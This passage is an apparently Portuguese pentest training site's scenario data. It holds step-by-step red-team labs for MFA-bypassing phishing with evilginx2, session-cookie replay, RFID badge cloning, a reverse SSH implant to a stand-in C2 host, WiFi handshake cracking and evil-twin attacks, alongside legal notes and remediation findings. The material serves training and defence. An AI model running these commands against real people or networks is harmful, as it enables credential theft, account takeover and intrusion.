0:[[["$","link","0",{"rel":"stylesheet","href":"/_next/static/css/e2b0e9a017016516.css","precedence":"next","crossOrigin":"$undefined"}]],["$","$L2",null,{"buildId":"HnlZ0Vo-jvdx46RWWnvRm","assetPrefix":"","initialCanonicalUrl":"/","initialTree":["",{"children":["__PAGE__",{}]},"$undefined","$undefined",true],"initialSeedData":["",{"children":["__PAGE__",{},[["$L3",["$","$4",null,{"fallback":null,"children":["$","$L5",null,{"groups":[{"id":"humanos","title":"Ataques Humanos","description":"Engenharia social, OSINT e operações Red Team físicas.","icon":"🧠","scenarioIds":["phishing","physical","osint"]},{"id":"redes","title":"Redes","description":"WiFi corporativa, DNS e dispositivos IoT/IIoT.","icon":"📡","scenarioIds":["wifi","dns","iot"]},{"id":"servidores","title":"Servidores e Infraestrutura","description":"Windows, Linux, Active Directory, containers e ICS.","icon":"🖥️","scenarioIds":["windows-eternalblue","linux-dirtypipe","active-directory","docker","kubernetes","scada"]},{"id":"apps","title":"Aplicações","description":"Web (OWASP Top 10), APIs REST/GraphQL e Mobile Android.","icon":"🧩","scenarioIds":["web-owasp","api-rest","mobile-android"]},{"id":"cloud","title":"Cloud & DevOps","description":"AWS, Azure/M365 e segurança de pipelines CI/CD.","icon":"☁️","scenarioIds":["aws","cicd","azure"]},{"id":"dados","title":"Dados & Serviços","description":"Bancos de dados expostos e infraestrutura de e-mail/BEC.","icon":"🗄️","scenarioIds":["databases","email-bec"]},{"id":"redteam","title":"Red Team Avançado","description":"Cadeia ransomware completa e bypass de AV/EDR (lab).","icon":"🛡️","scenarioIds":["ransomware","edr-evasion"]}],"scenarios":[{"id":"phishing","groupId":"humanos","title":"Phishing & Spear Phishing — Engenharia Social Direcionada","shortTitle":"Phishing / Spear Phishing","summary":"Campanha simulada de phishing direcionado contra colaboradores de uma empresa fictícia, do OSINT inicial até a captura de credenciais e bypass de MFA via proxy reverso.","difficulty":"intermediario","duration":"4-6h","objectives":["Mapear alvos via OSINT (LinkedIn, dehashed, hunter.io)","Construir pretexto credível e payload de captura","Hospedar landing-page clone e capturar credenciais","Bypass de MFA via proxy reverso (evilginx-like)","Documentar evidências e propor mitigação"],"prerequisites":["Domínio de phishing registrado e aquecido (warm-up SMTP)","Servidor VPS com TLS válido (Let's Encrypt)","Autorização escrita do cliente (escopo, lista de alvos, janela)"],"toolset":["gophish","evilginx2","maltego","hunter.io","dnstwist","mailspoof","kingphisher"],"mitre":[{"tactic":"Reconnaissance","technique":"Gather Victim Identity Information","id":"T1589"},{"tactic":"Resource Development","technique":"Acquire Infrastructure: Domains","id":"T1583.001"},{"tactic":"Initial Access","technique":"Phishing: Spearphishing Link","id":"T1566.002"},{"tactic":"Execution","technique":"User Execution: Malicious Link","id":"T1204.001"},{"tactic":"Credential Access","technique":"Adversary-in-the-Middle","id":"T1557"}],"steps":[{"id":"recon","kind":"recon","title":"1. OSINT — Coleta de alvos e padrão de e-mail","goal":"Identificar funcionários, e-mails e ferramentas internas usadas pela empresa-alvo.","commands":[{"tool":"hunter.io (CLI)","command":"curl \"https://api.hunter.io/v2/domain-search?domain=alvo.com.br&api_key=$HUNTER_KEY\" | jq .","expected":"Lista de e-mails públicos + padrão (ex.: nome.sobrenome@alvo.com.br)","notes":"Use somente em domínios autorizados pelo escopo."},{"tool":"dnstwist","command":"dnstwist --registered alvo.com.br","expected":"Domínios typo/IDN disponíveis para registro defensivo (ou ofensivo no engagement)."},{"tool":"theHarvester","command":"theHarvester -d alvo.com.br -b linkedin,bing,duckduckgo -l 200"}],"decision":{"question":"Qual estratégia de pretexto adotar?","options":[{"id":"rh","label":"Mensagem do RH sobre férias / 13º salário","consequence":"Alta taxa de clique, baixa suspeita inicial, mas chama atenção do RH se houver report.","recommended":true},{"id":"ti","label":"Aviso da TI sobre expiração de senha","consequence":"Perfeito para captura de credenciais; risco de detecção caso o helpdesk seja contatado."},{"id":"fornecedor","label":"Pedido de orçamento de fornecedor","consequence":"Útil para áreas comerciais/financeiro; payload típico é anexo malicioso."}]}},{"id":"infra","kind":"enum","title":"2. Infraestrutura — Domínio + TLS + SPF/DKIM","goal":"Subir landing-page clone com TLS e configurar autenticidade de e-mail.","commands":[{"tool":"certbot","command":"certbot certonly --standalone -d portal-rh.alvo-corp.com"},{"tool":"evilginx2","command":"evilginx2 -p /opt/evilginx/phishlets\nphishlets hostname o365 portal-rh.alvo-corp.com\nphishlets enable o365\nlures create o365\nlures get-url 0","expected":"URL única para o phishlet O365 com captura de cookies (bypass de MFA)."},{"tool":"gophish","command":"docker run -d --name gophish -p 3333:3333 -p 8080:80 -p 4443:443 gophish/gophish:latest"}]},{"id":"envio","kind":"exploit","title":"3. Envio — Campanha + tracking","goal":"Disparar campanha controlada com tracking pixel e redirect para phishlet.","commands":[{"tool":"gophish (UI)","command":"# Sending Profile → SMTP relay autenticado\n# Email Template → HTML com {{.URL}} e {{.TrackingURL}}\n# Landing Page → Capturar credenciais e redirecionar para portal real"},{"tool":"msmtp (debug)","command":"echo \"teste\" | msmtp -d --from=rh@alvo-corp.com vitima@alvo.com.br"}],"evidence":["Logs de envio (gophish results.csv)","Cookies capturados (evilginx sessions)","Screenshots do portal clonado"]},{"id":"pos","kind":"post","title":"4. Pós-acesso — Validação e cleanup","goal":"Validar acesso com cookies capturados e remover infraestrutura.","commands":[{"tool":"cookie-editor","command":"# Importar JSON de cookies do evilginx no navegador isolado\n# Acessar https://login.microsoftonline.com sem precisar de senha/MFA"},{"tool":"cleanup","command":"docker rm -f gophish && rm -rf /opt/evilginx/data/*\ncertbot delete --cert-name portal-rh.alvo-corp.com"}]}],"report":[{"finding":"Ausência de DMARC com política reject","severity":"alta","cvss":"7.5 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N)","description":"O domínio alvo.com.br não publica registro DMARC com p=reject, permitindo spoofing direto de mensagens em nome do domínio.","impact":"Atacantes podem enviar mensagens falsificadas que passam SPF/DKIM e chegam à caixa de entrada.","remediation":["Publicar TXT _dmarc.alvo.com.br \"v=DMARC1; p=reject; rua=mailto:dmarc@alvo.com.br; pct=100\"","Habilitar DKIM em todos os tenants emissores","Monitorar relatórios agregados via Postmark / Valimail"],"references":["https://dmarc.org","RFC 7489"]},{"finding":"MFA contornável por roubo de cookie de sessão","severity":"critica","cvss":"9.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)","description":"O fluxo de login do M365 não valida fingerprint do dispositivo nem aplica Continuous Access Evaluation (CAE).","impact":"Cookie roubado via AiTM concede acesso completo até a expiração natural (até 90 dias).","remediation":["Habilitar Conditional Access com \"require compliant device\"","Ativar Token Protection (Sign-in token binding)","Reduzir lifetime de refresh token e habilitar CAE"]}],"legalNote":"Campanha somente em domínios e usuários listados no escopo. Manter logs de autorização e canal direto com o sponsor para abortar caso haja impacto operacional.","liveSimulation":{"attackerLabel":"Atacante — Kali 2025","targetLabel":"Vítima — vinicius@alvo.com.br","attackerPrompt":"root@kali","targetPrompt":"vinicius@win10","actions":[{"side":"attacker","kind":"cmd","text":"curl -s \"https://api.hunter.io/v2/domain-search?domain=alvo.com.br\" | jq \".data.emails | length\"","delayMs":800,"explanation":{"title":"OSINT: listagem de e-mails corporativos","body":"O atacante consulta hunter.io para mapear e-mails públicos do domínio-alvo. Isso dá o padrão (nome.sobrenome) e uma lista de potenciais vítimas.","mitre":"T1589.002"}},{"side":"attacker","kind":"output","text":"47","delayMs":700,"explanation":{"title":"47 e-mails coletados","body":"A empresa tem 47 e-mails públicos indexados. Tempo total da recon passiva: segundos. Nenhum pacote foi enviado diretamente ao alvo.","mitre":"T1589.002"}},{"side":"attacker","kind":"cmd","text":"certbot certonly --standalone -d portal-rh.alvo-corp.com","delayMs":1200,"explanation":{"title":"TLS válido para domínio look-alike","body":"O atacante registrou um domínio parecido (alvo-corp.com, não alvo.com.br) e emite certificado Let's Encrypt. A vítima verá cadeado verde no navegador.","mitre":"T1583.001"}},{"side":"attacker","kind":"event","text":"Certificate emitted: /etc/letsencrypt/live/portal-rh.alvo-corp.com/fullchain.pem","delayMs":800,"explanation":{"title":"Infraestrutura pronta","body":"Com TLS válido, o phishlet fica indistinguível visualmente do login real da Microsoft.","mitre":"T1583.001"}},{"side":"attacker","kind":"cmd","text":"evilginx2 -p /opt/evilginx/phishlets","delayMs":1000,"explanation":{"title":"evilginx2: proxy reverso AiTM","body":"O evilginx2 age como man-in-the-middle: repassa a requisição da vítima pro Microsoft real e intercepta senha + cookies de sessão autenticados.","mitre":"T1557"}},{"side":"attacker","kind":"cmd","text":"gophish: campaign \"Q2 Spear Phishing\" → 12 targets → SEND","delayMs":1200,"explanation":{"title":"Disparo da campanha","body":"Gophish envia e-mail personalizado (merge-tag com nome do alvo) via relay SMTP autenticado. Assunto: \"URGENTE: senha expirando em 24h\".","mitre":"T1566.002"}},{"side":"target","kind":"event","text":"[Outlook] Novo e-mail: \"URGENTE: senha expirando em 24h\" — TI ","delayMs":1000,"explanation":{"title":"E-mail chega na caixa de entrada","body":"Passa por SPF (remetente é do alvo-corp.com, que tem SPF válido próprio). DMARC do alvo-corp.com está em modo none — Microsoft Defender marca apenas como \"external\" mas não bloqueia.","mitre":"T1566.002"},"visual":{"kind":"inbox","fromName":"TI — Suporte Corporativo","fromAddress":"ti-alertas@alvo-corp.com","subject":"URGENTE: senha expirando em 24h","preview":"Prezado(a), identificamos que sua senha expira em 24h. Renove...","time":"09:41"}},{"side":"target","kind":"log","text":"Defender ATP: External sender, link detected, sandbox scan: clean (0/60)","delayMs":800,"explanation":{"title":"Sandbox não detecta","body":"O link aponta para um domínio recém-registrado com TLS válido e conteúdo clonado em tempo real. Sandboxes que navegam anonimamente recebem a página real da Microsoft — nada suspeito.","mitre":"T1036"}},{"side":"target","kind":"cmd","text":"click: \"Clique aqui para renovar sua senha\"","delayMs":1400,"explanation":{"title":"Vítima clica no link","body":"Usuário confia no remetente aparente (ti-alertas@alvo-corp.com) e na urgência. Abre o link.","mitre":"T1204.001"},"visual":{"kind":"click","target":"email link"}},{"side":"target","kind":"output","text":"GET https://portal-rh.alvo-corp.com/login → 200 OK","delayMs":600,"explanation":{"title":"Página clone aberta","body":"A vítima vê a página real do Microsoft 365 — o evilginx2 está repassando tudo do login.microsoftonline.com em tempo real."},"visual":{"kind":"browser","url":"https://portal-rh.alvo-corp.com/login","screen":"login"}},{"side":"attacker","kind":"event","text":"[evilginx] new session: 10.0.4.22 → login.microsoftonline.com (proxied)","delayMs":700,"explanation":{"title":"evilginx intercepta o fluxo","body":"O proxy reverso entra em ação silenciosamente. Cada pacote da vítima é encaminhado pro Microsoft, cada resposta volta pela vítima — com o evilginx lendo tudo no meio.","mitre":"T1557"}},{"side":"target","kind":"event","text":"form.email ← \"vinicius@alvo.com.br\"","delayMs":1100,"explanation":{"title":"Vítima digita o e-mail","body":"O formulário é visualmente idêntico ao login oficial da Microsoft — mesma cor, mesmo layout, mesmo favicon. Com TLS válido o browser não levanta suspeita.","mitre":"T1204.002"},"visual":{"kind":"typing","field":"user","value":"vinicius@alvo.com.br"}},{"side":"target","kind":"event","text":"form.password ← \"Pr1mavera2025!\"","delayMs":1200,"explanation":{"title":"Vítima digita a senha","body":"Senha digitada em campo mascarado — mas o evilginx2 captura o valor em plaintext do corpo da requisição.","mitre":"T1056"},"visual":{"kind":"typing","field":"pass","value":"Pr1mavera2025!"}},{"side":"target","kind":"cmd","text":"POST /common/login { user: \"vinicius@alvo.com.br\", pass: \"Pr1mavera2025!\" }","delayMs":900,"explanation":{"title":"Vítima clica em Entrar","body":"Acredita estar logando no portal da empresa. As credenciais passam pelo evilginx antes de chegar ao Microsoft.","mitre":"T1110"},"visual":{"kind":"click","target":"entrar"}},{"side":"attacker","kind":"alert","text":"CAPTURED: vinicius@alvo.com.br : Pr1mavera2025!","delayMs":500,"explanation":{"title":"Credenciais capturadas","body":"Senha em plaintext no log do evilginx. Mas ainda falta o MFA — o atacante precisa dos cookies de sessão autenticados.","mitre":"T1056"}},{"side":"target","kind":"event","text":"Microsoft Authenticator: \"Aprovar login em Outlook?\" [Aprovar]","delayMs":1400,"explanation":{"title":"MFA push notification","body":"A vítima recebe o push no celular. O pedido parece vir do próprio login real da Microsoft — porque ele veio: o evilginx2 repassou a requisição legítima.","mitre":"T1621"},"visual":{"kind":"mfa","app":"Microsoft Authenticator","title":"Aprovar solicitação de entrada?","subtitle":"Outlook — Microsoft 365"}},{"side":"target","kind":"event","text":"Tap: [Aprovar]","delayMs":1200,"explanation":{"title":"Vítima aprova o push","body":"Não notou nada estranho no fluxo (nem o domínio look-alike nem o timing do push), por isso não suspeita. Aprova.","mitre":"T1621"},"visual":{"kind":"click","target":"aprovar"}},{"side":"target","kind":"output","text":"Set-Cookie: ESTSAUTHPERSISTENT=…; Domain=.login.microsoftonline.com","delayMs":800,"explanation":{"title":"Cookies de sessão emitidos","body":"O Microsoft emite os cookies pós-MFA. Esses cookies representam uma sessão já autenticada — quem os tiver não precisa mais de senha nem MFA."},"visual":{"kind":"browser","url":"https://portal-rh.alvo-corp.com/login","screen":"success"}},{"side":"attacker","kind":"alert","text":"HIJACKED: 11 cookies, including ESTSAUTHPERSISTENT (90-day lifetime)","delayMs":600,"explanation":{"title":"Cookies sequestrados","body":"O evilginx intercepta os cookies enquanto eles voltam para a vítima. MFA contornado. A sessão é replicável em qualquer navegador.","mitre":"T1550.004"}},{"side":"attacker","kind":"cmd","text":"curl -b cookies.json https://outlook.office.com/mail/ | grep -c \"Inbox\"","delayMs":1200,"explanation":{"title":"Atacante replica a sessão","body":"Importa os cookies em um browser/curl isolado e acessa o Outlook como a vítima. Sem senha, sem MFA.","mitre":"T1550.004"}},{"side":"attacker","kind":"output","text":"200 OK — mailbox acessado: 4342 mensagens, 18 pastas, OneDrive disponível","delayMs":700,"explanation":{"title":"Acesso confirmado","body":"Atacante agora tem leitura (e escrita) no e-mail corporativo. Pode lateralizar para OneDrive, Teams, SharePoint."}},{"side":"target","kind":"alert","text":"[Microsoft Sentinel] Impossible Travel: vinicius logged from BR then Amsterdam within 2min","delayMs":1200,"explanation":{"title":"SIEM detecta — tardio","body":"A regra \"Impossible Travel\" dispara porque o atacante está em outro país. Mas o alerta chega 2-5 minutos DEPOIS do roubo — tempo de sobra para o atacante exfiltrar.","mitre":"T1078.004"},"visual":{"kind":"toast","level":"error","title":"Impossible Travel detectado","body":"vinicius@alvo.com.br: BR → Amsterdam em 2 min"}},{"side":"target","kind":"log","text":"Conditional Access: policy \"require compliant device\" evaluated: ALLOW (legacy exemption)","delayMs":900,"explanation":{"title":"Conditional Access falho","body":"O tenant tem política de device compliance mas com exceção para apps legacy — e o atacante usou um cliente que pega essa exceção. Defesa contornada.","mitre":"T1556"}},{"side":"attacker","kind":"event","text":"FIM. Tempo total do ataque: ~3 minutos. Detecção: falhou.","delayMs":1200,"explanation":{"title":"Conclusão","body":"Phishing AiTM moderno contorna MFA em minutos. Defesas que funcionam: Token Protection (binding de cookie ao device), Continuous Access Evaluation (revoga sessão em tempo real), FIDO2 passkey (não é phishable). Cada uma dessas tornaria esse ataque inviável.","mitre":"M1032"}}]}},{"id":"physical","groupId":"humanos","title":"Physical Red Team — Acesso Físico Não Autorizado","shortTitle":"Physical Red Team","summary":"Engagement físico simulado: clonagem de crachás RFID, lockpicking, tailgating e implant de dispositivo de C2 dentro do perímetro corporativo.","difficulty":"avancado","duration":"2-3 dias","objectives":["Reconhecer perímetro físico (turnos, cameras, fechaduras)","Clonar crachá RFID/HID Prox","Acessar área restrita via tailgating + pretexto","Implantar dispositivo de C2 (LAN Turtle / Raspberry Pi)","Sair sem deixar rastros e gerar relatório com fotos"],"prerequisites":["Carta de autorização (Get-Out-of-Jail-Free Letter) assinada por C-level","Contato 24/7 para abortar (POC físico)","Lista de áreas autorizadas e proibidas"],"toolset":["Proxmark3","iCopy-X","Lockpick set (Bogota/Sparrow)","LAN Turtle","Raspberry Pi 4 + 4G hat","Câmera escondida","Roupa pretexto (uniforme técnico)"],"mitre":[{"tactic":"Initial Access","technique":"Hardware Additions","id":"T1200"},{"tactic":"Initial Access","technique":"Replication Through Removable Media","id":"T1091"},{"tactic":"Persistence","technique":"Hardware Additions","id":"T1200"}],"steps":[{"id":"recon","kind":"recon","title":"1. Recon Físico — Mapeamento do perímetro","goal":"Mapear entradas, turnos da segurança, posicionamento de câmeras e fechaduras.","commands":[{"tool":"OSINT (Google Earth + Streetview)","command":"# Identificar entradas de serviço, doca, fumódromo (alta probabilidade de tailgating)\n# Catalogar marca de fechaduras (Yale, Papaiz, Aldrava) via fotos públicas"},{"tool":"Walk-by (3 passagens em horários distintos)","command":"# 07:30 — entrada turno administrativo\n# 12:00 — almoço (porta destrancada por movimento)\n# 22:00 — segurança noturna (1 vigia, ronda 30/30 min)"}],"decision":{"question":"Qual vetor primário de entrada usar?","options":[{"id":"tailgating","label":"Tailgating no fumódromo às 14h","consequence":"Baixo atrito, alto sucesso. Risco médio se recepção pedir crachá.","recommended":true},{"id":"entregador","label":"Pretexto de entregador (caixa + uniforme)","consequence":"Acesso ao lobby garantido; difícil ir além sem crachá clonado."},{"id":"lockpick","label":"Lockpick na porta de serviço às 03h","consequence":"Alto risco se houver alarme/sensor; preferir como Plan B."}]}},{"id":"rfid","kind":"exploit","title":"2. Clonagem de Crachá RFID/HID","goal":"Clonar crachá de funcionário via leitor de longa distância.","commands":[{"tool":"Proxmark3","command":"pm3 --> hf 14a info\npm3 --> hf mf autopwn\npm3 --> hf mf restore --1k --uid ","expected":"UID + setores Mifare Classic dump completo.","notes":"HID Prox 125kHz: usar lf hid read e lf hid clone t55xx."},{"tool":"Long-range reader (Tastic RFID Thief)","command":"# Leitor escondido em mochila/maleta capta crachá a até 1m\n# Salva UIDs em microSD para clonagem offline"}]},{"id":"implant","kind":"post","title":"3. Implant de C2 dentro do perímetro","goal":"Conectar dispositivo discreto à rede interna para acesso remoto persistente.","commands":[{"tool":"LAN Turtle (configuração)","command":"# Módulo autossh para reverse SSH:\nautossh -M 0 -N -R 2222:localhost:22 redteam@c2.attacker.tld\n# Plugado atrás de impressora multifuncional ou PC ocioso"},{"tool":"Raspberry Pi 4 + 4G","command":"sudo apt install openvpn dnsmasq\n# Boot headless + OpenVPN out-of-band via 4G\n# Esconder em sala técnica ou cabide acima do forro"}],"evidence":["Foto do crachá clonado com data/hora","Vídeo timelapse da entrada por tailgating (camera escondida)","Captura de pacotes da LAN interna após 24h"]}],"report":[{"finding":"Política de tailgating inexistente; sem mantraps em entradas críticas","severity":"alta","description":"A entrada principal opera apenas com catraca simples sem reconhecimento facial nem segurança orientada a abordar visitantes não acompanhados.","impact":"Qualquer indivíduo bem vestido entra na empresa sem autenticação e acessa estações de trabalho desbloqueadas.","remediation":["Implementar mantrap (porta dupla intertravada) em entradas restritas","Treinar segurança para abordagem cordial obrigatória de qualquer pessoa sem crachá visível","Adicionar reconhecimento facial pareado ao crachá (anti-passback)"]},{"finding":"Crachás Mifare Classic 1K vulneráveis a clonagem","severity":"alta","description":"Os crachás utilizam Mifare Classic 1K com chave default em alguns setores, permitindo clonagem em < 30 segundos.","impact":"Atacante com Proxmark3 clona crachás em fila de elevador ou aproximação casual.","remediation":["Migrar para Mifare DESFire EV2/EV3 com AES","Habilitar verificação biométrica adicional em áreas críticas (sala de servidores, datacenter)","Auditar logs de acesso para detectar uso simultâneo do mesmo UID em locais distintos"]},{"finding":"Portas de rede ativas em áreas comuns","severity":"critica","description":"Tomadas RJ-45 atrás de impressoras na sala de cópias estão ativas e na VLAN corporativa, sem 802.1X.","impact":"Implant de C2 obteve IP DHCP e acesso completo à rede interna em < 1 minuto.","remediation":["Habilitar 802.1X com EAP-TLS em toda a infraestrutura cabeada","Desativar portas não utilizadas via NAC","Segmentar VLANs de impressoras e dispositivos IoT"]}],"legalNote":"Levar SEMPRE a Get-Out-of-Jail Letter assinada e o telefone do POC. Em qualquer abordagem por segurança, identificar-se imediatamente e apresentar a carta. Nunca destrancar fisicamente cofres, gavetas pessoais ou áreas marcadas como fora de escopo."},{"id":"osint","groupId":"humanos","title":"OSINT Avançado — Inteligência de Fontes Abertas","shortTitle":"OSINT Avançado","summary":"Coleta estruturada de inteligência sobre uma organização-alvo: pessoas, infraestrutura, código vazado e padrões de credenciais reutilizadas.","difficulty":"intermediario","duration":"6-10h","objectives":["Mapear superfície de exposição (DNS, subdomínios, IPs)","Coletar funcionários e roles via LinkedIn/Sales Navigator","Identificar credenciais expostas em breaches (HIBP / DeHashed)","Buscar código/secrets vazados em GitHub/Postman/Pastebin","Construir grafo Maltego do alvo"],"prerequisites":["API keys: hunter.io, dehashed, shodan, censys, github","VPN para evitar rate-limiting por IP"],"toolset":["amass","subfinder","shodan","censys","maltego","spiderfoot","trufflehog","gitleaks","theHarvester"],"mitre":[{"tactic":"Reconnaissance","technique":"Active Scanning","id":"T1595"},{"tactic":"Reconnaissance","technique":"Search Open Websites/Domains","id":"T1593"},{"tactic":"Reconnaissance","technique":"Gather Victim Identity Information","id":"T1589"}],"steps":[{"id":"dns","kind":"recon","title":"1. Enumeração DNS passiva e ativa","goal":"Encontrar subdomínios e IPs expostos sem tocar diretamente no alvo (passiva).","commands":[{"tool":"amass","command":"amass enum -passive -d alvo.com.br -o subs.txt","expected":"Lista de subdomínios coletados de fontes públicas (CT, AlienVault, etc)."},{"tool":"subfinder + httpx","command":"subfinder -d alvo.com.br -silent | httpx -title -tech-detect -status-code"},{"tool":"crt.sh","command":"curl -s \"https://crt.sh/?q=%25.alvo.com.br&output=json\" | jq -r \".[].name_value\" | sort -u"}]},{"id":"shodan","kind":"recon","title":"2. Shodan / Censys — superfície na internet","goal":"Identificar serviços expostos: VPN antiga, MongoDB aberto, Jenkins público.","commands":[{"tool":"shodan","command":"shodan search \"ssl.cert.subject.cn:*.alvo.com.br\" --fields ip_str,port,product"},{"tool":"censys","command":"censys search \"services.tls.certificates.leaf_data.subject.common_name: *.alvo.com.br\""}],"decision":{"question":"Encontrou Jenkins exposto sem autenticação. O que fazer?","options":[{"id":"documentar","label":"Documentar e continuar OSINT (não tocar)","consequence":"Mantém OPSEC; deixa para fase de exploitation no engagement.","recommended":true},{"id":"explorar","label":"Validar imediatamente acessando /script","consequence":"Pode acionar logs/SOC; viola boa prática de OSINT puro."}]}},{"id":"breaches","kind":"recon","title":"3. Credenciais vazadas","goal":"Cruzar e-mails coletados com dumps de breaches.","commands":[{"tool":"dehashed CLI","command":"curl -u \"$DH_USER:$DH_KEY\" \"https://api.dehashed.com/search?query=domain:alvo.com.br\" | jq .","expected":"JSON com email, senha (hash ou plain), origem do leak."},{"tool":"h8mail","command":"h8mail -t emails.txt -c h8mail.ini --gen-targets"}]},{"id":"github","kind":"recon","title":"4. Secrets em repositórios públicos","goal":"Buscar API keys, credenciais e código interno vazado.","commands":[{"tool":"github dorking","command":"# https://github.com/search?q=%22alvo.com.br%22+password&type=code\n# https://github.com/search?q=org%3Aalvo+aws_secret&type=code"},{"tool":"trufflehog","command":"trufflehog github --org=alvo --concurrency=10"},{"tool":"gitleaks","command":"gitleaks detect --source . --report-format sarif --report-path gitleaks.sarif"}],"evidence":["Lista de subdomínios vivos com tech stack","Planilha de e-mails + breaches com data e origem","Repositórios com secrets indexados (URL + linha)","Mapa Maltego (export PDF)"]}],"report":[{"finding":"Credenciais corporativas em 4 breaches públicos","severity":"alta","description":"147 e-mails @alvo.com.br aparecem em LinkedIn 2021, Collection #1, RaidForums 2022 e Anti Public Combo. Em 38 casos a senha era reutilizada (validado contra portal de RH).","impact":"Acesso direto a portais sem MFA usando credentials stuffing automatizado.","remediation":["Forçar reset de senha para todos os usuários listados","Implementar Have-I-Been-Pwned API no fluxo de login","Habilitar MFA obrigatório para 100% dos colaboradores"]},{"finding":"Token AWS exposto em repositório público","severity":"critica","description":"Repositório alvo/scripts-deploy contém AWS_ACCESS_KEY_ID com permissões S3:*, vazado há 8 meses.","impact":"Atacante com a chave pode listar e exfiltrar buckets corporativos. A chave ainda estava ativa no momento do teste.","remediation":["Revogar a chave imediatamente via IAM","Auditar CloudTrail dos últimos 8 meses para uso suspeito","Habilitar GitHub Advanced Security + push protection","Adotar OIDC federation em vez de chaves estáticas"]}],"legalNote":"OSINT por definição usa apenas fontes públicas. Não tente login com credenciais vazadas, não baixe dumps protegidos por copyright, e respeite ToS das plataformas."},{"id":"wifi","groupId":"redes","title":"WiFi WPA2/WPA3 — Captura de Handshake e Evil Twin","shortTitle":"WiFi WPA2","summary":"Avaliação de segurança WiFi corporativa: deauth + captura de handshake, ataque PMKID, quebra offline com hashcat e Evil Twin para bypass de WPA2-Enterprise.","difficulty":"intermediario","duration":"4-8h","objectives":["Mapear SSIDs e clientes próximos","Capturar handshake WPA2-PSK ou PMKID","Quebrar offline com hashcat + GPU","Montar Evil Twin para WPA2-Enterprise (captura MSCHAPv2)"],"prerequisites":["Adaptador WiFi com modo monitor (Alfa AWUS036ACS / TP-Link Archer T2U Plus)","Autorização escrita para emitir deauth no SSID corporativo"],"toolset":["airmon-ng","airodump-ng","aircrack-ng","hcxdumptool","hashcat","eaphammer","wifite2","kismet"],"mitre":[{"tactic":"Credential Access","technique":"Network Sniffing","id":"T1040"},{"tactic":"Credential Access","technique":"Brute Force: Password Cracking","id":"T1110.002"},{"tactic":"Credential Access","technique":"Adversary-in-the-Middle: Evil Twin","id":"T1557.004"},{"tactic":"Initial Access","technique":"Hardware Additions","id":"T1200"}],"steps":[{"id":"monitor","kind":"recon","title":"1. Modo monitor e descoberta de SSIDs","goal":"Colocar a placa em monitor mode e listar redes/clientes.","commands":[{"tool":"airmon-ng","command":"airmon-ng check kill\nairmon-ng start wlan0\niw dev","expected":"wlan0mon ativo em modo monitor."},{"tool":"airodump-ng","command":"airodump-ng wlan0mon --band abg -w scan","expected":"Tabela com BSSID, ESSID, encryption, clientes associados."}]},{"id":"pmkid","kind":"exploit","title":"2. Captura PMKID (sem deauth, mais OPSEC-friendly)","goal":"Capturar PMKID do AP — não exige cliente conectado.","commands":[{"tool":"hcxdumptool","command":"hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1 --filtermode=2 --filterlist_ap=alvos.txt"},{"tool":"hcxpcapngtool","command":"hcxpcapngtool -o hash.hc22000 capture.pcapng","expected":"Arquivo hash.hc22000 pronto para hashcat -m 22000."}],"decision":{"question":"O AP não respondeu PMKID. Próximo passo?","options":[{"id":"deauth","label":"Forçar deauth e capturar 4-way handshake","consequence":"Funciona mas é muito barulhento (IDS detecta deauth flood)."},{"id":"aguardar","label":"Aguardar handshake natural (passivo)","consequence":"Lento mas invisível. Use kismet para alertar quando capturar.","recommended":true}]}},{"id":"crack","kind":"exploit","title":"3. Quebra offline com hashcat","goal":"Submeter o hash a wordlist + regras.","commands":[{"tool":"hashcat","command":"hashcat -m 22000 hash.hc22000 rockyou.txt -r rules/best64.rule -w 3"},{"tool":"hashcat (mask attack)","command":"hashcat -m 22000 hash.hc22000 -a 3 ?u?l?l?l?l?l?d?d?d"}]},{"id":"eviltwin","kind":"exploit","title":"4. Evil Twin contra WPA2-Enterprise (PEAP-MSCHAPv2)","goal":"Forjar AP com mesmo SSID e capturar challenge/response do RADIUS.","commands":[{"tool":"eaphammer","command":"./eaphammer --essid CorpSSID --bssid AA:BB:CC:DD:EE:FF -i wlan1 --auth wpa-eap --creds","expected":"Arquivo hostapd-wpe.log com username + challenge + response do MSCHAPv2.","notes":"Os 3 blocos de 8 bytes do MSCHAPv2 Response são cifrados com NT hash dividido em 3 partes DES. O primeiro bloco ainda exige força bruta completa sobre o NT hash."},{"tool":"chapcrack (reduz MSCHAPv2 → desafio DES)","command":"chapcrack parse -i hostapd-wpe.log\nchapcrack crack -i hostapd-wpe.log --bruteforce # tenta localmente, ou:\nchapcrack genmschap --hash \"NT:\" \"\"","expected":"NT hash quebrado localmente (GPU) ou via crack.sh (serviço pago DES full-keyspace).","notes":"CloudCracker foi descontinuado; alternativa atual é crack.sh ou hashcat -m 5500 com o NetNTLMv1 derivado."},{"tool":"hashcat (NetNTLMv1 derivado)","command":"hashcat -m 5500 netntlmv1.hash rockyou.txt -r rules/best64.rule"}],"evidence":["Captura .pcapng com handshake/PMKID","Output do hashcat com senha quebrada","Lista de clientes que conectaram ao Evil Twin"]}],"report":[{"finding":"WPA2-PSK com senha fraca compartilhada","severity":"critica","description":"A rede CorpGuest usa PSK \"alvo2024\" (10 caracteres, padrão dicionário). Quebrada em 4 minutos com GPU RTX 3080.","impact":"Qualquer pessoa próxima ao prédio entra na rede corporativa de visitantes — que tem rota para impressoras/intranet.","remediation":["Migrar para WPA3-SAE","Para PSK, usar ≥ 20 caracteres aleatórios e rotacionar trimestralmente","Isolar rede de visitantes em VLAN sem rota interna"]},{"finding":"WPA2-Enterprise sem validação de certificado do servidor","severity":"alta","description":"Clientes Windows aceitam qualquer cert RADIUS apresentado pelo AP. Evil Twin capturou credenciais MSCHAPv2 de 12 funcionários.","impact":"Captura de credenciais AD em ataque passivo. NetNTLMv1 é trivialmente crackável.","remediation":["Distribuir CA corporativa via GPO + \"Verify server certificate\" obrigatório","Usar EAP-TLS (cert-based) em vez de PEAP-MSCHAPv2","Habilitar \"Do not prompt user to authorize new servers\""]}],"legalNote":"Deauth e Evil Twin podem afetar redes vizinhas no mesmo canal — coordene com TI para janela de teste e canal específico."},{"id":"dns","groupId":"redes","title":"DNS Attacks — Cache Poisoning, Tunneling e Subdomain Takeover","shortTitle":"DNS Attacks","summary":"Conjunto de ataques contra a infraestrutura e configurações DNS do alvo: subdomain takeover, DNS rebinding, cache poisoning e exfiltração via tunelamento.","difficulty":"intermediario","duration":"3-5h","objectives":["Encontrar subdomínios apontando para serviços desativados","Demonstrar takeover (CNAME 